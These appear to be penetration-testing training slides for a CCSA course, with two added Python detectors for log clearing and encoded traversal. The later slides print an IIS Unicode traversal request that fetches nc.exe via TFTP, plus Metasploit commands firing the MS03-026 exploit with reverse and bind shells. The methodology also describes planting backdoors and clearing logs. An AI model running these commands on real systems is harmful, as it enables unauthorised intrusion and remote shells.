Program: Certified Computer Security Analyst (CCSA), LSP Telematika
Created by Semi Yulianto
Shared by Linuxer@kaskus.co.id
Semi Yulianto
MCT, MCP, MCSA, MCSE, MCSA & MCSE: Security, MCTS, MCITP, CCNA, CCNP, CNI, CNA, CNE, CCA, CIW-CI, CIW-SA, CEI, CEH, ECSA, CHFI, EDRP, ECSP, etc.
Independent Trainer and Consultant, EC-Council Indonesia & Asia Pacific (Jakarta, Indonesia)
Current Roles:
- ITS2 (Riyadh, Saudi Arabia): Senior Technical Trainer/Security Consultant
- IshanTech (M) Sdn Bhd (Kuala Lumpur, Malaysia): Security Consultant (Web Application Pen-Tester); Security Consultant (ESET Anti-Virus & Smart Security)
Contacts: email@example.com and firstname.lastname@example.org; +62 852 1325 6600 and +60 14 9377 462
Agenda:
1. Vulnerabilities by Management Categories
2. Assessment Standards
3. Assessment Service Definition
4. Network Assessment Methodology
5. Pen-Test Methodology
6. Security Tools
7. Investigating Vulnerabilities
Vulnerabilities by Management Categories:
- OS configuration - Vulnerabilities due to improperly configured operating system software.
- Software maintenance - Vulnerabilities due to failure to apply patches for known vulnerabilities.
- Password/access control - Failure to comply with password policy and improper access control settings.
- Malicious software - Existence of malicious software (Trojans, worms, etc.) or evidence of its use.
- Dangerous services - Existence of vulnerable or easily exploited services or processes.
- Application configuration - Vulnerabilities due to improperly configured applications.
Assessment Standards:
NSA IAM (US) - The United States National Security Agency (NSA) has provided an INFOSEC Assessment Methodology (IAM) framework to help consultants and security professionals outside the NSA provide assessment services to clients in line with a recognized standard. http://www.iatrp.com
CESG CHECK (UK) - The Government Communications Headquarters (GCHQ) in the United Kingdom has an information assurance arm known as the Communications and Electronics Security Group (CESG). In the same way that the NSA IAM framework allows security consultants outside the NSA to provide assessment services, CESG operates a program known as CHECK to evaluate and accredit security testing teams within the U.K. to undertake government assessment work. http://www.cesg.gov.uk/site/check/index.cfm
The IAM framework defines three levels of assessment:
- Assessment (Level 1) - Involves discovering a cooperative high-level overview of the organization being assessed, including access to policies, procedures, and information flow. No hands-on network or system testing is undertaken at this level.
- Evaluation (Level 2) - A hands-on cooperative process that involves testing with network scanning, penetration tools, and the use of specific technical expertise.
- Red Team (Level 3) - Non-cooperative and external to the target network, involving penetration testing to simulate the appropriate adversary.
IAM assessment is non-intrusive, so within this framework a Level 3 assessment involves full qualification of vulnerabilities.
CESG CHECK defines the network security assessment competencies as:
1. Use of DNS information retrieval tools for both single and multiple records, including an understanding of DNS record structure relating to target hosts.
2. Use of ICMP, TCP, and UDP network mapping and probing tools.
3. Demonstration of TCP service banner grabbing.
4. Information retrieval using SNMP, including an understanding of MIB structure relating to target system configuration and network routes.
5. Understanding of common weaknesses in routers and switches relating to Telnet, HTTP, SNMP, and TFTP access and configuration.
CESG CHECK Unix-specific competencies:
1. User enumeration via finger, rusers, rwho, and SMTP techniques.
2. Use of tools to enumerate Remote Procedure Call (RPC) services and demonstrate an understanding of the security implications associated with those services.
3. Demonstration of testing for Network File System (NFS) weaknesses.
4. Testing for weaknesses within r-services (rsh, rexec, and rlogin).
5. Detection of insecure X Windows servers.
6. Testing for weaknesses within web, FTP, and Samba services.
CESG CHECK Windows NT-specific competencies:
1. Assessment of NetBIOS and CIFS services to enumerate users, groups, shares, domains, domain controllers, password policies, and associated weaknesses.
2. Username and password grinding via NetBIOS and CIFS services.
3. Detecting and demonstrating the presence of known security weaknesses within Internet Information Server (IIS) web and FTP service components, and Microsoft SQL Server.
Other Assessment Standards & Associations:
- ISECOM's Open Source Security Testing Methodology Manual (OSSTMM) http://www.osstmm.org
- Council of Registered Ethical Security Testers (CREST) http://www.crestapproved.com
- TIGER Scheme http://www.tigerscheme.org
- EC-Council's Certified Ethical Hacker (CEH) http://www.eccouncil.org/CEH.htm
- Open Source Web Application Security Project (OWASP) http://www.owasp.org
Assessment Service Definition:
Vulnerability Scanning - Uses automated systems (such as Nessus, ISS Internet Scanner, QualysGuard, or eEye Retina) with minimal hands-on qualification and assessment of vulnerabilities. This is an inexpensive way to ensure that no obvious vulnerabilities exist, but it doesn't provide a clear strategy to improve security.
Network Security Assessment - An effective blend of automated and hands-on manual vulnerability testing and qualification. The report is usually handwritten, accurate, and concise, giving practical advice that can improve a company's security.
Web Application Testing - Involves post-authentication assessment of web application components, identifying command injection, poor permissions, and other weaknesses within a given web application. Testing at this level involves extensive manual qualification and consultant involvement, and it cannot be easily automated.
Penetration Testing - Involves multiple attack vectors (e.g., telephone war dialing, social engineering, and wireless testing) to compromise the target environment. It demonstrates and discusses the methodologies adopted by determined Internet-based attackers to compromise IP networks remotely, which in turn will allow you to improve IP network security.
Onsite Auditing - Provides the clearest picture of network security. Consultants have local system access and run tools on each system capable of identifying anything untoward, including rootkits, weak user passwords, poor permissions, and other issues. 802.11 wireless testing is often performed as part of onsite auditing.
High-level components of Network Assessment:
1. Network reconnaissance to identify IP networks and hosts of interest.
2. Bulk network scanning and probing to identify potentially vulnerable hosts.
3. Investigation of vulnerabilities and further network probing by hand.
4. Exploitation of vulnerabilities and circumvention of security mechanisms.
Pen-Test Methodology:
1. Information Gathering
2. Service Enumeration
3. Vulnerability Identification
4. Penetration
5. Maintaining Access
6. Housekeeping
Information Gathering - The objective of information gathering is to find as much information as possible about the target of evaluation by using passive (Google, Whois, WWW) or active (social engineering) information gathering.
Service Enumeration - Involves launching network and port scanning to find open and filtered ports and the services running on a specific port.
Vulnerability Identification - Involves finding new and currently known vulnerabilities in the operating systems, applications and/or services (manually or with automated tools).
Penetration - Involves active penetration of a specific target of evaluation by exploiting any new or known vulnerability.
Maintaining Access - Involves uploading a trojan or backdoor with the objective of making it easier to go in and out of a target of evaluation without having to repeat the exploitation, and of ensuring that the activities are not noticed.
Housekeeping - Cleaning up to cover tracks. Involves disabling audit settings and clearing or altering log files (system, security and application).
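The housekeeping step described above leaves its own trail, and that trail is what a defender looks for. The following is an added example, not part of the original slides: it runs over a constructed export of Windows Security-log records and flags the two event IDs that audit tampering produces (1102, "the audit log was cleared", and 4719, "system audit policy was changed", both real Windows event IDs) together with a per-host EventRecordID regression, which is what a cleared log looks like because the record counter restarts. The function names (find_tampering, hosts_with_findings) and the sample records are the example's own.

```python
"""Surface log-clearing and audit-policy tampering in a Windows Security-log export.
Added example for defenders; the records below are constructed, not data from the slides."""

# Real Windows Security-log event IDs generated when audit settings are tampered with.
TAMPERING_IDS = {
    1102: "security audit log was cleared",
    4719: "system audit policy was changed",
}

# Constructed sample export: (host, EventRecordID, EventID, user).
# EventRecordID normally only increases on a host; a drop means the log was cleared or replaced.
SAMPLE_EVENTS = [
    ("srv1", 5001, 4624, "alice"),
    ("srv1", 5002, 4672, "alice"),
    ("srv1", 5003, 4719, "svc_backup"),   # audit policy changed
    ("srv1", 1,    1102, "svc_backup"),   # log cleared: counter restarts at 1
    ("srv1", 2,    4624, "svc_backup"),
    ("srv2", 900,  4624, "bob"),
    ("srv2", 901,  4634, "bob"),
]


def find_tampering(events):
    """Return (host, record_id, reason) for every tampering event or record-id regression,
    in the order the records were seen. Both checks run on every record, so a cleared log
    usually yields two findings: the 1102 event itself and the counter reset it caused."""
    findings = []
    last_record = {}
    for host, record_id, event_id, user in events:
        if event_id in TAMPERING_IDS:
            findings.append(
                (host, record_id, f"event {event_id}: {TAMPERING_IDS[event_id]} (by {user})")
            )
        prev = last_record.get(host)
        if prev is not None and record_id < prev:
            findings.append(
                (host, record_id, f"record id fell from {prev} to {record_id}: log cleared or replaced")
            )
        last_record[host] = record_id
    return findings


def hosts_with_findings(events):
    """Distinct hosts that produced at least one finding, sorted for stable reporting."""
    return sorted({host for host, _, _ in find_tampering(events)})


if __name__ == "__main__":
    for host, record_id, reason in find_tampering(SAMPLE_EVENTS):
        print(f"{host} #{record_id}: {reason}")
```

The record-id regression check is the useful half: an attacker who disables auditing before clearing the log still cannot stop the counter reset from showing up in a forwarded copy of the log, which is why exports should be collected centrally rather than read only on the host.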
Scanning Tools:
1. Nmap (http://www.insecure.org)
2. Nessus (http://www.nessus.org)
3. ISS Internet Scanner (http://www.iss.net)
4. eEye Retina (http://www.eeye.com)
5. QualysGuard (http://www.qualys.com)
6. Matta Colossus (http://www.trustmatta.com)
TFTP (Trivial File Transfer Protocol) Upload and Download

Syntax:
    tftp -i <localhost_ip> GET <file>
    tftp -i <localhost_ip> PUT <file>

Example:
    tftp -i 220.127.116.11 GET nc.exe
    tftp -i 18.104.22.168 PUT nc.exe

Unicode Example:
    GET http://22.214.171.124/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp+-i+126.96.36.199+GET+nc.exe
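The "Unicode" request on this slide works because the server checks the path once and then decodes it again: `%255c` becomes `%5c` on the first pass and a backslash on the second, and overlong UTF-8 such as `%c0%af` is accepted as a slash. A defender reviewing access logs or writing a WAF rule therefore has to normalize the request target the same way before matching. The following is an added example, not code from the original slides: it decodes a request target until the value stops changing, folds the overlong slash forms, and then flags traversal and interpreter use over constructed sample log lines (the function names normalize_path, classify and scan_log and the sample addresses are the example's own). It goes slightly beyond the slide by also catching single-encoded `%2f` traversal.

```python
"""Flag encoded directory-traversal requests of the kind shown on the TFTP slide.
Added example for defenders; the log lines below are constructed, not from the slides."""
import re
from urllib.parse import unquote_to_bytes

# Constructed sample access log: client, method, request target, status.
SAMPLE_LOG = """\
10.0.0.5 GET /index.html 200
10.0.0.9 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 200
10.0.0.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+10.0.0.9+GET+nc.exe 200
10.0.0.7 GET /images/logo.png 200
10.0.0.8 GET /docs/..%2f..%2fetc/passwd 404
"""

# Overlong UTF-8 forms of '/' and '\' that older IIS decoders accepted (the "Unicode" bug).
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}
TRAVERSAL = re.compile(r"\.\.[\\/]")
INTERPRETERS = ("cmd.exe", "tftp")


def normalize_path(raw: str, max_rounds: int = 5) -> str:
    """Percent-decode until stable (so %255c -> %5c -> \\), then fold overlong slashes.
    This re-interprets the target the way the vulnerable server did after its naive check."""
    data = raw.encode("utf-8")
    for _ in range(max_rounds):          # bounded so a pathological input cannot loop forever
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    for bad, good in OVERLONG.items():
        data = data.replace(bad, good)
    return data.decode("latin-1")        # byte-preserving: every byte maps to one code point


def classify(raw_target: str):
    """Reasons the request looks like traversal / command execution, or [] if it looks clean."""
    norm = normalize_path(raw_target)
    reasons = []
    if TRAVERSAL.search(norm):
        reasons.append("traversal")
    if any(tool in norm.lower() for tool in INTERPRETERS):
        reasons.append("interpreter")
    return reasons


def scan_log(text: str):
    """Return (client, raw_target, reasons) for every suspicious line in a log export."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue                     # skip blank or malformed lines
        client, _method, target, _status = parts[:4]
        reasons = classify(target)
        if reasons:
            hits.append((client, target, reasons))
    return hits


if __name__ == "__main__":
    for client, target, reasons in scan_log(SAMPLE_LOG):
        print(client, ",".join(reasons), target)
```

The decode loop, not the pattern list, is the point: a rule that matches `../` against the raw request never sees the traversal in `..%255c..`, which is exactly why the request on the slide got past the server's own check.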
Metasploit Framework Exploit Module (MSFConsole)
    cd /pentest/exploits/msf3
    ./msfconsole

Syntax:
    msf > help
    msf > show exploits
    msf > use <exploit_module>
    msf > show payloads
    msf > set PAYLOAD <payload_type>
    msf > show options
    msf > set RHOST <target_ip>
    msf > set LHOST <localhost_ip>
    msf > set LPORT <local_port>
    msf > set RPORT <remote_port>
    msf > show targets
    msf > set TARGET <target_id>
    msf > exploit
Metasploit Framework Exploit Module (MSFConsole)
    cd /pentest/exploits/msf3
    ./msfconsole

Example:
    msf > help
    msf > show exploits
    msf > use windows/dcerpc/ms03_026_dcom
    msf > show payloads
    msf > set PAYLOAD windows/shell/reverse_tcp
    msf > show options
    msf > set RHOST 188.8.131.52
    msf > set LHOST 184.108.40.206
    msf > set LPORT 5555
    msf > set RPORT 1234
    msf > show targets
    msf > set TARGET 0
    msf > exploit
Metasploit Framework Auxiliary Module
    cd /pentest/exploits/msf3
    ./msfconsole

Syntax:
    msf > help
    msf > show auxiliary
    msf > use <auxiliary_module>
    msf > set RHOSTS <target_ip_or_network_id>
    msf > run
Metasploit Framework Auxiliary Module
    cd /pentest/exploits/msf3
    ./msfconsole

Example 1:
    msf > help
    msf > show auxiliary
    msf > use scanner/smb/smb_version
    msf > set RHOSTS 220.127.116.11
    msf > run

Example 2:
    msf > help
    msf > show auxiliary
    msf > use scanner/smb/smb_version
    msf > set RHOSTS 18.104.22.168/24
    msf > run
Metasploit Framework Exploit Module (MSFCLI)
    cd /pentest/exploits/msf3

Syntax:
    ./msfcli <exploit_module> <payload_type> <options> E

Example:
    ./msfcli windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=22.214.171.124 E